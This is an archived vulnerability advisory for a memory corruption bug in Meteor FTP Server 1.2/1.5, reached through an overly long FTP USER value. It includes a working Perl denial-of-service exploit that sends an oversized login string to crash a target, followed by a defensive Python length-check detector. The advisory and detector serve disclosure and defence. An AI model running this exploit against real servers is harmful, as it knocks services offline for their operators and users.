Meteor FTP Server 1.2/1.5 USER Memory Corruption Vulnerability
2014-07-01T00:00:00
ID SSV:76784 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/8376/info
Meteor FTP Server is prone to a memory corruption vulnerability that can be triggered by a malicious client via an overly long value for the FTP USER command. This could be exploited to cause a server crash.
Further reports indicate that this may also be exploitable to execute arbitrary code in the context of the affected server.
#!/usr/bin/perl
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the
# ftpd and issuing USER followed by large amounts of data, the server
# crashes. For more info, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org
use Net::FTP;
$host = $ARGV[0];
if("$ARGV[0]" eq "") {
print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
die("Usage : ./meteorftpdos <host\/ip>\n");
} else {
print("Connecting to $host...\n");
my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
print("Connected!\n");
print("Attempting to exploit the ftpd...");
$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
$ftp->quit;
print("Success!\n");
}
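
A defensive length check for the condition described above, as an added example that is not part of the original advisory or exploit: it scans client-to-server FTP control data and flags USER arguments or whole lines that exceed a size policy, including a line that never terminates. The limits, function names and sample traffic are assumptions constructed for illustration, not values from Meteor FTP.

```python
import re

# Assumed policy limits (not from the advisory or from Meteor FTP).
MAX_USER_ARG = 64   # longest username the policy accepts
MAX_LINE = 512      # longest control-channel line the policy accepts


def check_line(raw: bytes):
    """Return a reason string if one command line violates policy, else None."""
    if len(raw) > MAX_LINE:
        return f"line of {len(raw)} bytes exceeds {MAX_LINE}"
    verb, _, arg = raw.partition(b" ")
    # FTP verbs are case-insensitive, so normalise before comparing.
    if verb.upper() == b"USER" and len(arg) > MAX_USER_ARG:
        return f"USER argument of {len(arg)} bytes exceeds {MAX_USER_ARG}"
    return None


def inspect_stream(stream: bytes):
    """Split client-to-server bytes into lines; return (line_no, verb, reason)."""
    findings = []
    lines = re.split(rb"\r?\n", stream)
    tail = lines.pop()  # bytes after the last terminator (b"" if none)
    for n, raw in enumerate(lines, 1):
        reason = check_line(raw)
        if reason:
            findings.append((n, raw[:4].decode("ascii", "replace"), reason))
    # A client can also keep sending without ever ending the line; flag the
    # partial line once it outgrows the cap instead of buffering it forever.
    if len(tail) > MAX_LINE:
        findings.append((len(lines) + 1,
                         tail[:4].decode("ascii", "replace"),
                         f"unterminated line already {len(tail)} bytes"))
    return findings


# Constructed sample traffic: a normal login, then an oversized USER value.
SAMPLE = (b"USER alice\r\nPASS secret\r\n"
          b"USER " + b"A" * 300 + b"\r\n"
          b"QUIT\r\n")

if __name__ == "__main__":
    for finding in inspect_stream(SAMPLE):
        print(finding)
```

The same check can sit in a filtering proxy in front of the server or run over captured control-channel logs.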